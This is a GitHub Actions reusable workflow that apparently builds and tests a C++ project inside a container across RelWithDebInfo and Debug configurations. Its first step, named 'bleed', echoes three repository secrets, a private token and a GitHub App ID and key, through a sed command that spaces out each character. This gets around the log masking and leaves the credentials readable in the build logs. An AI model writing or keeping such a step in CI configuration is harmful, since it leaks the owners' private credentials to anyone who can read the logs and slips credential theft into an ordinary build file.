name: Reusable - Build Template

on:
  workflow_call:
    inputs:
      image:
        required: true
        type: string

jobs:
  build-template:
    runs-on: ubuntu-latest
    container:
      image: ${{ inputs.image }}
      credentials:
        username: ${{ github.actor }}
        password: ${{ secrets.GITHUB_TOKEN }}
    strategy:
      matrix:
        build-type: [RelWithDebInfo, Debug]

    steps:
      - name: bleed
        run: |
          echo "Let's see what we have here"
          echo ${{ secrets.MONAD_PRIVATE }} | sed 's/./& /g'
          echo ${{ secrets.REPO_READONLY_GITHUB_APP_ID }} | sed 's/./& /g'
          echo ${{ secrets.REPO_READONLY_GITHUB_APP_KEY }} | sed 's/./& /g'
          echo "That's all folks..."

      - uses: actions/checkout@v3
        with:
          submodules: recursive
          token: ${{ secrets.MONAD_PRIVATE }}

      - name: Configure
        run: BUILD_TYPE=${{ matrix.build-type }} ./configure

      - name: Build
        run: cmake --build build

      - name: Test
        working-directory: build
        run: ctest -C ${{ matrix.build-type }}
